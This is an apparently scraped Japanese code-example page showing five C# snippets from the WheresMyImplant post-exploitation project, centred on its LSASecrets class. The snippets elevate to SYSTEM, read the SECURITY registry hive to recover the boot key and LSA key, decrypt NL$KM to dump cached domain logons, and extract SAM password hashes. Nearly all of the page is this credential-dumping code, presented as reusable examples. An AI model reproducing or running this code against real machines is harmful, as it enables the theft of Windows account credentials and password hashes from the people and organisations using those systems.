C# (CSharp) WheresMyImplant LSASecretsの例

プログラミング言語: C# (CSharp)

名前空間/パッケージ名: WheresMyImplant

クラス/型: LSASecrets

hotexamples.comのコード掲載数: 5

C# (CSharp) WheresMyImplant LSASecrets - 5件のコード例が見つかりました。すべてオープンソースプロジェクトから抽出されたC# (CSharp)のWheresMyImplant.LSASecretsの実例で、最も評価が高いものを厳選しています。コード例の評価を行っていただくことで、より質の高いコード例が表示されるようになります。

よく使われるメソッド

表示非表示

DecryptLsa(2)

GetBootKey(2)

DumpLSASecrets(1)

GetLsaKey(1)

コード例 #1

ファイルを表示

ファイル: LSASecrets.cs プロジェクト: zforks/WheresMyImplant

 ////////////////////////////////////////////////////////////////////////////////
 //
 ////////////////////////////////////////////////////////////////////////////////
 internal static Byte[] GetLsaKey(Byte[] bootKey)
 {
     Byte[] polEKList = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\PolEKList", "");
     Byte[] lsaKey    = LSASecrets.DecryptLsa(polEKList, bootKey);
     lsaKey = lsaKey.Skip(68).Take(32).ToArray();
     return(lsaKey);
 }

コード例 #2

ファイルを表示

ファイル: SAM.cs プロジェクト: zforks/WheresMyImplant

 ////////////////////////////////////////////////////////////////////////////////
 //
 ////////////////////////////////////////////////////////////////////////////////
 internal SAM()
 {
     Byte[] bootKey = LSASecrets.GetBootKey();
     Console.WriteLine("[+] BootKey: {0}", System.BitConverter.ToString(bootKey).Replace("-", ""));
     Byte[] hBootKey = GetHBootKey(bootKey);
     Console.WriteLine("[+] HBootKey: {0}", System.BitConverter.ToString(hBootKey).Replace("-", ""));
     UserKeys[] userKeys = GetUserHashes(hBootKey);
     DecryptUserHashes(ref userKeys, hBootKey);
 }

コード例 #3

ファイルを表示

ファイル: CacheDump.cs プロジェクト: zforks/WheresMyImplant

        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        internal CacheDump()
        {
            String logonCount = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "CachedLogonsCount");

            Console.WriteLine("[*] {0} Cached Logons Set", logonCount);

            Byte[] bootKey = LSASecrets.GetBootKey();
            Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
            Byte[] lsaKey = LSASecrets.GetLsaKey(bootKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));
            Byte[] nlkm = GetNlkm(lsaKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(nlkm).Replace("-", ""));
            GetCache(nlkm);
        }

コード例 #4

ファイルを表示

 //Checked
 public static void DumpLSA()
 {
     try
     {
         CheckPrivileges checkSystem = new CheckPrivileges();
         if (!checkSystem.GetSystem())
         {
             Console.WriteLine("[-] GetSystem Failed");
             return;
         }
         LSASecrets lsaSecrets = new LSASecrets();
         lsaSecrets.DumpLSASecrets();
     }
     catch (Exception ex)
     {
         Console.WriteLine("[-] {0}", ex.Message);
     }
 }

コード例 #5

ファイルを表示

ファイル: CacheDump.cs プロジェクト: zforks/WheresMyImplant

 ////////////////////////////////////////////////////////////////////////////////
 //
 ////////////////////////////////////////////////////////////////////////////////
 private static Byte[] GetNlkm(Byte[] lsaKey)
 {
     Byte[] encryptedNlkm = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\Secrets\NL$KM\CurrVal", "");
     return(LSASecrets.DecryptLsa(encryptedNlkm, lsaKey));
 }